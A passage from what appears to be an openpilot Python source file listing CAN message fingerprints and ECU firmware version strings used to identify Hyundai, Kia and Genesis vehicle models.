67: 8, 68: 8, 127: 8, 304: 8, 320: 8, 339: 8, 356: 4, 544: 8, 593: 8, 608: 8, 688: 5, 809: 8, 832: 8, 854: 7, 870: 7, 871: 8, 872: 8, 897: 8, 902: 8, 903: 8, 916: 8, 1040: 8, 1042: 8, 1056: 8, 1057: 8, 1064: 8, 1078: 4, 1107: 5, 1136: 8, 1151: 6, 1168: 7, 1170: 8, 1173: 8, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1331: 8, 1332: 8, 1333: 8, 1342: 6, 1345: 8, 1348: 8, 1363: 8, 1369: 8, 1370: 8, 1371: 8, 1384: 8, 1407: 8, 1411: 8, 1419: 8, 1425: 2, 1427: 6, 1444: 8, 1456: 4, 1470: 8, 1489: 1
}],
CAR.KIA_STINGER: [{
67: 8, 127: 8, 304: 8, 320: 8, 339: 8, 356: 4, 358: 6, 359: 8, 544: 8, 576: 8, 593: 8, 608: 8, 688: 5, 809: 8, 832: 8, 854: 7, 870: 7, 871: 8, 872: 8, 897: 8, 902: 8, 909: 8, 916: 8, 1040: 8, 1042: 8, 1056: 8, 1057: 8, 1064: 8, 1078: 4, 1107: 5, 1136: 8, 1151: 6, 1168: 7, 1170: 8, 1173: 8, 1184: 8, 1265: 4, 1280: 1, 1281: 4, 1287: 4, 1290: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1363: 8, 1369: 8, 1371: 8, 1378: 4, 1379: 8, 1384: 8, 1407: 8, 1419: 8, 1425: 2, 1427: 6, 1456: 4, 1470: 8
}],
CAR.GENESIS_G70: [{
67: 8, 127: 8, 304: 8, 320: 8, 339: 8, 356: 4, 358: 6, 544: 8, 576: 8, 593: 8, 608: 8, 688: 5, 809: 8, 832:8, 854: 7, 870: 7, 871: 8, 872: 8, 897: 8, 902: 8, 909: 8, 916: 8, 1040: 8, 1042: 8, 1056: 8, 1057: 8, 1064: 8, 1078: 4, 1107: 5, 1136: 8, 1151: 6, 1156: 8, 1168: 7, 1170: 8, 1173:8, 1184: 8, 1186: 2, 1191: 2, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1363: 8, 1369: 8, 1379: 8, 1384: 8, 1407: 8, 1419:8, 1427: 6, 1456: 4, 1470: 8, 1988: 8, 1996: 8, 2000: 8, 2004: 8, 2008: 8, 2012: 8, 2015: 8
}],
CAR.GENESIS_G80: [{
67: 8, 68: 8, 127: 8, 304: 8, 320: 8, 339: 8, 356: 4, 358: 6, 544: 8, 593: 8, 608: 8, 688: 5, 809: 8, 832: 8, 854: 7, 870: 7, 871: 8, 872: 8, 897: 8, 902: 8, 903: 8, 916: 8, 1024: 2, 1040: 8, 1042: 8, 1056: 8, 1057: 8, 1078: 4, 1107: 5, 1136: 8, 1151: 6, 1156: 8, 1168: 7, 1170: 8, 1173: 8, 1184: 8, 1191: 2, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1363: 8, 1369: 8, 1370: 8, 1371: 8, 1378: 4, 1384: 8, 1407: 8, 1419: 8, 1425: 2, 1427: 6, 1434: 2, 1456: 4, 1470: 8
},
{
67: 8, 68: 8, 127: 8, 304: 8, 320: 8, 339: 8, 356: 4, 358: 6, 359: 8, 544: 8, 546: 8, 593: 8, 608: 8, 688: 5, 809: 8, 832: 8, 854: 7, 870: 7, 871: 8, 872: 8, 897: 8, 902: 8, 903: 8, 916: 8, 1040: 8, 1042: 8, 1056: 8, 1057: 8, 1064: 8, 1078: 4, 1107: 5, 1136: 8, 1151: 6, 1156: 8, 1157: 4, 1168: 7, 1170: 8, 1173: 8, 1184: 8, 1265: 4, 1280: 1, 1281: 3, 1287: 4, 1290: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1363: 8, 1369: 8, 1370: 8, 1371: 8, 1378: 4, 1384: 8, 1407: 8, 1419: 8, 1425: 2, 1427: 6, 1434: 2, 1437: 8, 1456: 4, 1470: 8
},
{
67: 8, 68: 8, 127: 8, 304: 8, 320: 8, 339: 8, 356: 4, 358: 6, 544: 8, 593: 8, 608: 8, 688: 5, 809: 8, 832: 8, 854: 7, 870: 7, 871: 8, 872: 8, 897: 8, 902: 8, 903: 8, 916: 8, 1040: 8, 1042: 8, 1056: 8, 1057: 8, 1064: 8, 1078: 4, 1107: 5, 1136: 8, 1151: 6, 1156: 8, 1157: 4, 1162: 8, 1168: 7, 1170: 8, 1173: 8, 1184: 8, 1193: 8, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1363: 8, 1369: 8, 1371: 8, 1378: 4, 1384: 8, 1407: 8, 1419: 8, 1425: 2, 1427: 6, 1437: 8, 1456: 4, 1470: 8
}],
CAR.GENESIS_G90: [{
67: 8, 68: 8, 127: 8, 304: 8, 320: 8, 339: 8, 356: 4, 358: 6, 359: 8, 544: 8, 593: 8, 608: 8, 688: 5, 809: 8, 854: 7, 870: 7, 871: 8, 872: 8, 897: 8, 902: 8, 903: 8, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1107: 5, 1136: 8, 1151: 6, 1162: 4, 1168: 7, 1170: 8, 1173: 8, 1184: 8, 1265: 4, 1280: 1, 1281: 3, 1287: 4, 1290: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1345: 8, 1348: 8, 1363: 8, 1369: 8, 1370: 8, 1371: 8, 1378: 4, 1384: 8, 1407: 8, 1419: 8, 1425: 2, 1427: 6, 1434: 2, 1456: 4, 1470: 8, 1988: 8, 2000: 8, 2003: 8, 2004: 8, 2005: 8, 2008: 8, 2011: 8, 2012: 8, 2013: 8
}],
CAR.IONIQ_EV_2020: [{
127: 8, 304: 8, 320: 8, 339: 8, 352: 8, 356: 4, 524: 8, 544: 7, 593: 8, 688: 5, 832: 8, 881: 8, 882: 8, 897: 8, 902: 8, 903: 8, 905: 8, 909: 8, 916: 8, 1040: 8, 1042: 8, 1056: 8, 1057: 8, 1078: 4, 1136: 8, 1151: 6, 1155: 8, 1156: 8, 1157: 4, 1164: 8, 1168: 7, 1173: 8, 1183: 8, 1186: 2, 1191: 2, 1225: 8, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1291: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1355: 8, 1363: 8, 1369: 8, 1379: 8, 1407: 8, 1419: 8, 1426: 8, 1427: 6, 1429: 8, 1430: 8, 1456: 4, 1470: 8, 1473: 8, 1507: 8, 1535: 8, 1988: 8, 1996: 8, 2000: 8, 2004: 8, 2005: 8, 2008: 8, 2012: 8, 2013: 8
}],
CAR.IONIQ_EV_LTD: [{
127: 8, 304: 8, 320: 8, 339: 8, 352: 8, 356: 4, 544: 7, 593: 8, 688: 5, 832: 8, 881: 8, 882: 8, 897: 8, 902: 8, 903: 8, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1136: 8, 1151: 6, 1168: 7, 1173: 8, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1291: 8, 1292: 8, 1294: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1355: 8, 1363: 8, 1369: 8, 1407: 8, 1419: 8, 1425: 2, 1426: 8, 1427: 6, 1429: 8, 1430: 8, 1456: 4, 1470: 8, 1507: 8, 1535: 8
}],
CAR.IONIQ: [{
68:8, 127: 8, 304: 8, 320: 8, 339: 8, 352: 8, 356: 4, 524: 8, 544: 8, 576:8, 593: 8, 688: 5, 832: 8, 881: 8, 882: 8, 897: 8, 902: 8, 903: 8, 905: 8, 909: 8, 916: 8, 1040: 8, 1042: 8, 1056: 8, 1057: 8, 1078: 4, 1136: 6, 1151: 6, 1155: 8, 1156: 8, 1157: 4, 1164: 8, 1168: 7, 1173: 8, 1183: 8, 1186: 2, 1191: 2, 1225: 8, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1291: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1355: 8, 1363: 8, 1369: 8, 1379: 8, 1407: 8, 1419: 8, 1426: 8, 1427: 6, 1429: 8, 1430: 8, 1448: 8, 1456: 4, 1470: 8, 1473: 8, 1476: 8, 1507: 8, 1535: 8, 1988: 8, 1996: 8, 2000: 8, 2004: 8, 2005: 8, 2008: 8, 2012: 8, 2013: 8
}],
CAR.KONA: [{
67: 8, 127: 8, 304: 8, 320: 8, 339: 8, 354: 3, 356: 4, 544: 8, 593: 8, 608: 8, 688: 5, 809: 8, 832 : 8, 854: 7, 870: 7, 871: 8, 872: 8, 897: 8, 902: 8, 903: 8, 905: 8, 909: 8, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1064: 8, 1078: 4, 1107: 5, 1136: 8, 1151: 6, 1156: 8, 1170: 8, 1173: 8, 1186: 2, 1191: 2, 1193: 8, 1265: 4,1280: 1, 1287: 4, 1290: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1363: 8, 1369: 8, 1378: 8, 1384: 8, 1394: 8, 1407: 8, 1414: 3, 1419: 8, 1427: 6, 1456: 4, 1470: 8, 1988: 8, 1996: 8, 2000: 8, 2001: 8, 2004: 8, 2008: 8, 2009: 8, 2012: 8
}],
CAR.KONA_EV: [{
127: 8, 304: 8, 320: 8, 339: 8, 352: 8, 356: 4, 544: 8, 549: 8, 593: 8, 688: 5, 832: 8, 881: 8, 882: 8, 897: 8, 902: 8, 903: 8, 905: 8, 909: 8, 916: 8, 1040: 8, 1042: 8, 1056: 8, 1057: 8, 1078: 4, 1136: 8, 1151: 6, 1168: 7, 1173: 8, 1183: 8, 1186: 2, 1191: 2, 1225: 8, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1291: 8, 1292: 8, 1294: 8, 1307: 8, 1312: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1355: 8, 1363: 8, 1369: 8, 1378: 4, 1407: 8, 1419: 8, 1426: 8, 1427: 6, 1429: 8, 1430: 8, 1456: 4, 1470: 8, 1473: 8, 1507: 8, 1535: 8, 2000: 8, 2004: 8, 2008: 8, 2012: 8, 1157: 4, 1193: 8, 1379: 8, 1988: 8, 1996: 8
}],
CAR.KIA_NIRO_EV: [{
127: 8, 304: 8, 320: 8, 339: 8, 352: 8, 356: 4, 516: 8, 544: 8, 593: 8, 688: 5, 832: 8, 881: 8, 882: 8, 897: 8, 902: 8, 903: 8, 905: 8, 909: 8, 916: 8, 1040: 8, 1042: 8, 1056: 8, 1057: 8, 1078: 4, 1136: 8, 1151: 6, 1156: 8, 1157: 4, 1168: 7, 1173: 8, 1183: 8, 1186: 2, 1191: 2, 1193: 8, 1225: 8, 1260: 8, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1291: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1355: 8, 1363: 8, 1369: 8, 1407: 8, 1419: 8, 1426: 8, 1427: 6, 1429: 8, 1430: 8, 1456: 4, 1470: 8, 1473: 8, 1507: 8, 1535: 8, 1990: 8, 1998: 8, 1996: 8, 2000: 8, 2004: 8, 2008: 8, 2012: 8, 2015: 8
}],
CAR.KIA_FORTE: [{
67: 8, 127: 8, 304: 8, 320: 8, 339: 8, 354: 3, 356: 4, 544: 8, 576: 8, 593: 8, 608: 8, 688: 5, 809: 8, 832: 8, 854: 7, 870: 7, 871: 8, 872: 8, 897: 8, 902: 8, 903: 8, 905: 8, 909: 8, 916: 8, 1040: 8, 1042: 8, 1056: 8, 1057: 8, 1078: 4, 1107: 5, 1136: 8, 1156: 8, 1170: 8, 1173: 8, 1186: 2, 1191: 2, 1225: 8, 1265: 4, 1280: 4, 1287: 4, 1290: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1363: 8, 1369: 8, 1384: 8, 1394: 8, 1407: 8, 1414: 3, 1419: 8, 1427: 6, 1456: 4, 1470: 8, 1988: 8, 1996: 8, 2000: 8, 2004: 8, 2008: 8, 2012: 8, 2015: 8
}],
CAR.KIA_OPTIMA_H: [{
68: 8, 127: 8, 304: 8, 320: 8, 339: 8, 352: 8, 356: 4, 544: 8, 593: 8, 688: 5, 832: 8, 881: 8, 882: 8, 897: 8, 902: 8, 903: 6, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1136: 6, 1151: 6, 1168: 7, 1173: 8, 1236: 2, 1265: 4, 1280: 1, 1287: 4, 1290: 8, 1291: 8, 1292: 8, 1322: 8, 1331: 8, 1332: 8, 1333: 8, 1342: 6, 1345: 8, 1348: 8, 1355: 8, 1363: 8, 1369: 8, 1371: 8, 1407: 8, 1419: 8, 1427: 6, 1429: 8, 1430: 8, 1448: 8, 1456: 4, 1470: 8, 1476: 8, 1535: 8
},
{
68: 8, 127: 8, 304: 8, 320: 8, 339: 8, 352: 8, 356: 4, 544: 8, 576: 8, 593: 8, 688: 5, 881: 8, 882: 8, 897: 8, 902: 8, 903: 8, 909: 8, 912: 7, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1136: 6, 1151: 6, 1168: 7, 1173: 8, 1180: 8, 1186: 2, 1191: 2, 1265: 4, 1268: 8, 1280: 1, 1287: 4, 1290: 8, 1291: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1355: 8, 1363: 8, 1369: 8, 1371: 8, 1407: 8, 1419: 8, 1420: 8, 1425: 2, 1427: 6, 1429: 8, 1430: 8, 1448: 8, 1456: 4, 1470: 8, 1476: 8, 1535: 8
}],
CAR.PALISADE: [{
67: 8, 127: 8, 304: 8, 320: 8, 339: 8, 356: 4, 544: 8, 546: 8, 547: 8, 548: 8, 549: 8, 576: 8, 593: 8, 608: 8, 688: 6, 809: 8, 832: 8, 854: 7, 870: 7, 871: 8, 872: 8, 897: 8, 902: 8, 903: 8, 905: 8, 909: 8, 913: 8, 916: 8, 1040: 8, 1042: 8, 1056: 8, 1057: 8, 1064: 8, 1078: 4, 1107: 5, 1123: 8, 1136: 8, 1151: 6, 1155: 8, 1156: 8, 1157: 4, 1162: 8, 1164: 8, 1168: 7, 1170: 8, 1173: 8, 1180: 8, 1186: 2, 1191: 2, 1193: 8, 1210: 8, 1225: 8, 1227: 8, 1265: 4, 1280: 8, 1287: 4, 1290: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1363: 8, 1369: 8, 1371: 8, 1378: 8, 1384: 8, 1407: 8, 1419: 8, 1427: 6, 1456: 4, 1470: 8, 1988: 8, 1996: 8, 2000: 8, 2004: 8, 2005: 8, 2008: 8, 2012: 8
}],
CAR.VELOSTER: [{
64: 8, 66: 8, 67: 8, 68: 8, 127: 8, 128: 8, 129: 8, 273: 8, 274: 8, 275: 8, 339: 8, 354: 3, 356: 4, 399: 8, 512: 6, 544: 8, 558: 8, 593: 8, 608: 8, 688: 5, 790: 8, 809: 8, 832: 8, 884: 8, 897: 8, 899: 8, 902: 8, 903: 8, 905: 8, 909: 8, 916: 8, 1040: 8, 1056: 8, 1057: 8, 1078: 4, 1170: 8, 1181: 5, 1186: 2, 1191: 2, 1265: 4, 1280: 1, 1282: 4, 1287: 4, 1290: 8, 1292: 8, 1294: 8, 1312: 8, 1322: 8, 1342: 6, 1345: 8, 1348: 8, 1349: 8, 1351: 8, 1353: 8, 1356: 8, 1363: 8, 1365: 8, 1366: 8, 1367: 8, 1369: 8, 1378: 4, 1407: 8, 1414: 3, 1415: 8, 1419: 8, 1427: 6, 1440: 8, 1456: 4, 1470: 8, 1486: 8, 1487: 8, 1491: 8, 1530: 8, 1532: 5, 1872: 8, 1988: 8, 1996: 8, 2000: 8, 2001: 8, 2004: 8, 2008: 8, 2009: 8, 2012: 8, 2015: 8, 2016: 8, 2017: 8, 2024: 8, 2025: 8
}]
}
# Don't use these fingerprints for fingerprinting, they are still used for ECU detection
IGNORED_FINGERPRINTS = [CAR.VELOSTER, CAR.GENESIS_G70, CAR.KONA]
FW_VERSIONS = {
CAR.IONIQ_EV_2020: {
(Ecu.fwdRadar, 0x7d0, None): [
b'\xf1\x00AEev SCC F-CUP 1.00 1.00 99110-G7200 ',
],
(Ecu.eps, 0x7d4, None): [
b'\xf1\x00AE MDPS C 1.00 1.01 56310/G7560 4APEC101',
],
(Ecu.fwdCamera, 0x7c4, None): [
b'\xf1\x00AEE MFC AT EUR RHD 1.00 1.01 95740-G2600 190819',
],
},
CAR.IONIQ_EV_LTD: {
(Ecu.fwdRadar, 0x7d0, None): [
b'\xf1\x00AEev SCC F-CUP 1.00 1.00 96400-G7000 ',
],
(Ecu.eps, 0x7d4, None): [
b'\xf1\x00AE MDPS C 1.00 1.02 56310G7300\x00 4AEEC102',
],
(Ecu.fwdCamera, 0x7c4, None): [
b'\xf1\x00AEE MFC AT EUR LHD 1.00 1.00 95740-G7200 160418',
],
},
CAR.SONATA: {
(Ecu.fwdRadar, 0x7d0, None): [
b'\xf1\x00DN8_ SCC FHCUP 1.00 1.01 99110-L1000 ',
b'\xf1\x00DN8_ SCC FHCUP 1.00 1.00 99110-L0000 ',
b'\xf1\x00DN8_ SCC F-CU- 1.00 1.00 99110-L0000 ',
b'\xf1\x00DN8_ SCC F-CUP 1.00 1.00 99110-L0000 ',
],
(Ecu.esp, 0x7d1, None): [
b'\xf1\x00DN ESC \x01 102\x19\x04\x13 58910-L1300\xf1\xa01.02',
b'\xf1\x00DN ESC \x06 104\x19\x08\x01 58910-L0100',
b'\xf1\x8758910-L0100\xf1\x00DN ESC \x06 104\x19\x08\x01 58910-L0100\xf1\xa01.04',
b'\xf1\x8758910-L0100\xf1\x00DN ESC \x07 104\x19\x08\x01 58910-L0100\xf1\xa01.04',
],
(Ecu.engine, 0x7e0, None): [
b'HM6M2_0a0_BD0',
b'\xf1\x87391162M003\xf1\xa0000F',
b'\xf1\x87391162M003\xf1\xa00240',
b'HM6M1_0a0_F00',
],
(Ecu.eps, 0x7d4, None): [
b'\xf1\x8756310-L1010\xf1\x00DN8 MDPS C 1.00 1.03 56310-L1010 4DNDC103\xf1\xa01.03',
b'\xf1\x8756310L0010\x00\xf1\x00DN8 MDPS C 1.00 1.01 56310L0010\x00 4DNAC101\xf1\xa01.01',
b'\xf1\x8756310-L0010\xf1\x00DN8 MDPS C 1.00 1.01 56310-L0010 4DNAC101\xf1\xa01.01',
],
(Ecu.fwdCamera, 0x7c4, None): [
b'\xf1\x00DN8 MFC AT KOR LHD 1.00 1.02 99211-L1000 190422',
b'\xf1\x00DN8 MFC AT USA LHD 1.00 1.00 99211-L0000 190716',
b'\xf1\x00DN8 MFC AT USA LHD 1.00 1.01 99211-L0000 191016',
],
(Ecu.transmission, 0x7e1, None): [
b'\xf1\x00HT6TA260BLHT6TA800A1TDN8C20KS4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00',
b'\xf1\x00bcsh8p54 U903\x00\x00\x00\x00\x00\x00SDN8T16NB0z{\xd4v',
b'\xf1\x00HT6WA250BLHT6WA910A1SDN8G25NB1\x00\x00\x00\x00\x00\x00\x96\xa1\xf1\x92',
b'\xf1\x00HT6WA250BLHT6WA910A1SDN8G25NB1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00',
],
},
CAR.SONATA_LF: {
(Ecu.fwdRadar, 0x7d0, None): [
b'\xf1\x00LF__ SCC F-CUP 1.00 1.00 96401-C2200 ',
],
(Ecu.esp, 0x7d1, None): [
b'\xf1\x00LF ESC \t 11 \x17\x01\x13 58920-C2610',
],
(Ecu.engine, 0x7e0, None): [
b'\xf1\x81606D5K51\x00\x00\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x7c4, None): [
b'\xf1\x00LFF LKAS AT USA LHD 1.00 1.01 95740-C1000 E51',
b'\xf1\xa01.01',
],
(Ecu.transmission, 0x7e1, None): [
b'\xf1\x87\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xf1\x816T6B4051\x00\x00\xf1\x006T6H0_C2\x00\x006T6B4051\x00\x00TLF0G24NL1\xb0\x9f\xee\xf5',
b'\xf1\x87\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xf1\x816T6B4051\x00\x00\xf1\x006T6H0_C2\x00\x006T6B4051\x00\x00TLF0G24NL1\x00\x00\x00\x00',
b'\xf1\x006T6H0_C2\x00\x006T6B4051\x00\x00TLF0G24NL1\xb0\x9f\xee\xf5',
],
},
CAR.SANTA_FE: {
(Ecu.fwdRadar, 0x7d0, None): [
b'\xf1\x00TM__ SCC F-CUP 1.00 1.03 99110-S2000 \xf1\xa01.03',
b'\xf1\x00TM__ SCC F-CUP 1.00 1.02 99110-S2000 \xf1\xa01.02',
],
(Ecu.esp, 0x7d1, None): [
b'\xf1\x00TM ESC \r 104\x19\a\b 58910-S2650\xf1\xa01.04',
b'\xf1\x00TM ESC \x02 100\x18\x030 58910-S2600\xf1\xa01.00',
],
(Ecu.engine, 0x7e0, None): [
b'\xf1\x81606G3051\x00\x00\x00\x00\x00\x00\x00\x00',
b'\xf1\x81606EA051\x00\x00\x00\x00\x00\x00\x00\x00',
],
(Ecu.eps, 0x7d4, None): [
b'\xf1\x00TM MDPS C 1.00 1.01 56340-S2000 9129',
b'\xf1\x00TM MDPS C 1.00 1.00 56340-S2000 8409',
],
(Ecu.fwdCamera, 0x7c4, None): [
b'\xf1\x00TM MFC AT USA LHD 1.00 1.00 99211-S2000 180409',
],
(Ecu.transmission, 0x7e1, None): [
b'\xf1\x87LDLUEA6159884HG1\x88\x87hv\x99\x99y\x97\x89\xaa\xb8\x9ax\x99\x87\x89y\x99\xb7\x99\xa7?\xf7\xff\x97wo\xff\xf3\x05\xf1\x816W3E1051\x00\x00\xf1\x006W351_C2\x00\x006W3E1051\x00\x00TTM4T20NS5\x00\x00\x00\x00',
b'\xf1\x87SBJWAA6562474GG0ffvgeTeFx\x88\x97\x88ww\x87www\x87w\x84o\xfa\xff\x87fO\xff\xc2 \xf1\x816W3C2051\x00\x00\xf1\x006W351_C2\x00\x006W3C2051\x00\x00TTM2G24NS1\x00\x00\x00\x00',
],
},
CAR.KIA_STINGER: {
(Ecu.fwdRadar, 0x7d0, None): [ b'\xf1\x00CK__ SCC F_CUP 1.00 1.01 96400-J5100 \xf1\xa01.01'],
(Ecu.engine, 0x7e0, None): [ b'\xf1\x81640E0051\x00\x00\x00\x00\x00\x00\x00\x00',],
(Ecu.eps, 0x7d4, None): [b'\xf1\x00CK MDPS R 1.00 1.04 57700-J5420 4C4VL104'],
(Ecu.fwdCamera, 0x7c4, None): [b'\xf1\x00CK MFC AT USA LHD 1.00 1.03 95740-J5000 170822'],
(Ecu.transmission, 0x7e1, None): [
b'\xf1\x87VDHLG17118862DK2\x8awWwgu\x96wVfUVwv\x97xWvfvUTGTx\x87o\xff\xc9\xed\xf1\x81E21\x00\x00\x00\x00\x00\x00\x00\xf1\x00bcsh8p54 E21\x00\x00\x00\x00\x00\x00\x00SCK0T33NB0\x88\xa2\xe6\xf0',
b'\xf1\x87VDHLG17000192DK2xdFffT\xa5VUD$DwT\x86wveVeeD&T\x99\xba\x8f\xff\xcc\x99\xf1\x81E21\x00\x00\x00\x00\x00\x00\x00\xf1\x00bcsh8p54 E21\x00\x00\x00\x00\x00\x00\x00SCK0T33NB0\x88\xa2\xe6\xf0',
],
},
CAR.KIA_OPTIMA_H: {
(Ecu.fwdRadar, 0x7d0, None): [b'\xf1\x00DEhe SCC H-CUP 1.01 1.02 96400-G5100 ',],
(Ecu.engine, 0x7e0, None): [b'\xf1\x816H6F4051\x00\x00\x00\x00\x00\x00\x00\x00',],
(Ecu.eps, 0x7d4, None): [b'\xf1\x00DE MDPS C 1.00 1.09 56310G5301\x00 4DEHC109',],
(Ecu.fwdCamera, 0x7c4, None): [b'\xf1\x00DEP MFC AT USA LHD 1.00 1.01 95740-G5010 170424',],
(Ecu.transmission, 0x7e1, None): [b"\xf1\x816U3J2051\x00\x00\xf1\x006U3H0_C2\x00\x006U3J2051\x00\x00PDE0G16NS2\xf4'\\\x91",],
},
CAR.PALISADE: {
(Ecu.fwdRadar, 0x7d0, None): [
b'\xf1\x00LX2_ SCC FHCUP 1.00 1.04 99110-S8100 \xf1\xa01.04',
b'\xf1\x00LX2 SCC FHCUP 1.00 1.04 99110-S8100 \xf1\xa01.04',
],
(Ecu.esp, 0x7d1, None): [
b'\xf1\x00LX ESC \v 102\x19\x05\a 58910-S8330\xf1\xa01.02',
b'\xf1\x00LX ESC \v 103\x19\t\x10 58910-S8360\xf1\xa01.03',
b'\xf1\x00LX ESC \x01 103\x19\t\x10 58910-S8360\xf1\xa01.03',
b'\xf1\x00LX ESC \x0b 102\x19\x05\x07 58910-S8330',
],
(Ecu.engine, 0x7e0, None): [
b'\xf1\x81640J0051\x00\x00\x00\x00\x00\x00\x00\x00',
b'\xf1\x81640K0051\x00\x00\x00\x00\x00\x00\x00\x00',
],
(Ecu.eps, 0x7d4, None): [
b'\xf1\x00LX2 MDPS C 1,00 1,03 56310-S8020 4LXDC103', # modified firmware
b'\xf1\x00LX2 MDPS C 1.00 1.03 56310-S8020 4LXDC103',
],
(Ecu.fwdCamera, 0x7c4, None): [
b'\xf1\x00LX2 MFC AT USA LHD 1.00 1.03 99211-S8100 190125',
b'\xf1\x00LX2 MFC AT USA LHD 1.00 1.05 99211-S8100 190909',
],
(Ecu.transmission, 0x7e1, None): [
b'\xf1\x87LBLUFN650868KF36\xa9\x98\x89\x88\xa8\x88\x88\x88h\x99\xa6\x89fw\x86gw\x88\x97x\xaa\x7f\xf6\xff\xbb\xbb\x8f\xff+\x82\xf1\x81U891\x00\x00\x00\x00\x00\x00\xf1\x00bcsh8p54 U891\x00\x00\x00\x00\x00\x00SLX2G38NB3\xd1\xc3\xf8\xa8',
b'\xf1\x87LBLUFN655162KF36\x98\x88\x88\x88\x98\x88\x88\x88x\x99\xa7\x89x\x99\xa7\x89x\x99\x97\x89g\x7f\xf7\xffwU_\xff\xe9!\xf1\x81U891\x00\x00\x00\x00\x00\x00\xf1\x00bcsh8p54 U891\x00\x00\x00\x00\x00\x00SLX2G38NB3\xd1\xc3\xf8\xa8',
b'\xf1\x87LDKVBN424201KF26\xba\xaa\x9a\xa9\x99\x99\x89\x98\x89\x99\xa8\x99\x88\x99\x98\x89\x88\x99\xa8\x89v\x7f\xf7\xffwf_\xffq\xa6\xf1\x81U891\x00\x00\x00\x00\x00\x00\xf1\x00bcsh8p54 U891\x00\x00\x00\x00\x00\x00SLX4G38NB2\xafL]\xe7',
b'\xf1\x87LDLVBN560098KF26\x86fff\x87vgfg\x88\x96xfw\x86gfw\x86g\x95\xf6\xffeU_\xff\x92c\xf1\x81U891\x00\x00\x00\x00\x00\x00\xf1\x00bcsh8p54 U891\x00\x00\x00\x00\x00\x00SLX4G38NB2\xafL]\xe7',
],
},
CAR.VELOSTER: {
(Ecu.fwdRadar, 0x7d0, None): [b'\xf1\x00JS__ SCC H-CUP 1.00 1.02 95650-J3200 ', ],
(Ecu.esp, 0x7d1, None): [b'\xf1\x00\x00\x00\x00\x00\x00\x00', ],
(Ecu.engine, 0x7e0, None): [b'\x01TJS-JNU06F200H0A', ],
(Ecu.eps, 0x7d4, None): [b'\xf1\x00JSL MDPS C 1.00 1.03 56340-J3000 8308', ],
(Ecu.fwdCamera, 0x7c4, None): [b'\xf1\x00JS LKAS AT USA LHD 1.00 1.02 95740-J3000 K32', ],
(Ecu.transmission, 0x7e1, None): [
b'\xf1\x816U2V8051\x00\x00\xf1\x006U2V0_C2\x00\x006U2V8051\x00\x00DJS0T16NS1\xba\x02\xb8\x80',
b'\xf1\x816U2V8051\x00\x00\xf1\x006U2V0_C2\x00\x006U2V8051\x00\x00DJS0T16NS1\x00\x00\x00\x00',
],
},
CAR.GENESIS_G70: {
(Ecu.fwdRadar, 0x7d0, None): [b'\xf1\x00IK__ SCC F-CUP 1.00 1.02 96400-G9100 \xf1\xa01.02', ],
(Ecu.engine, 0x7e0, None): [b'\xf1\x81640F0051\x00\x00\x00\x00\x00\x00\x00\x00', ],
(Ecu.eps, 0x7d4, None): [b'\xf1\x00IK MDPS R 1.00 1.06 57700-G9420 4I4VL106', ],
(Ecu.fwdCamera, 0x7c4, None): [b'\xf1\x00IK MFC AT USA LHD 1.00 1.01 95740-G9000 170920', ],
(Ecu.transmission, 0x7e1, None): [b'\xf1\x87VDJLT17895112DN4\x88fVf\x99\x88\x88\x88\x87fVe\x88vhwwUFU\x97eFex\x99\xff\xb7\x82\xf1\x81E25\x00\x00\x00\x00\x00\x00\x00\xf1\x00bcsh8p54 E25\x00\x00\x00\x00\x00\x00\x00SIK0T33NB2\x11\x1am\xda', ],
},
CAR.KONA: {
(Ecu.fwdRadar, 0x7d0, None): [b'\xf1\x00OS__ SCC F-CUP 1.00 1.00 95655-J9200 \xf1\xa01.00', ],
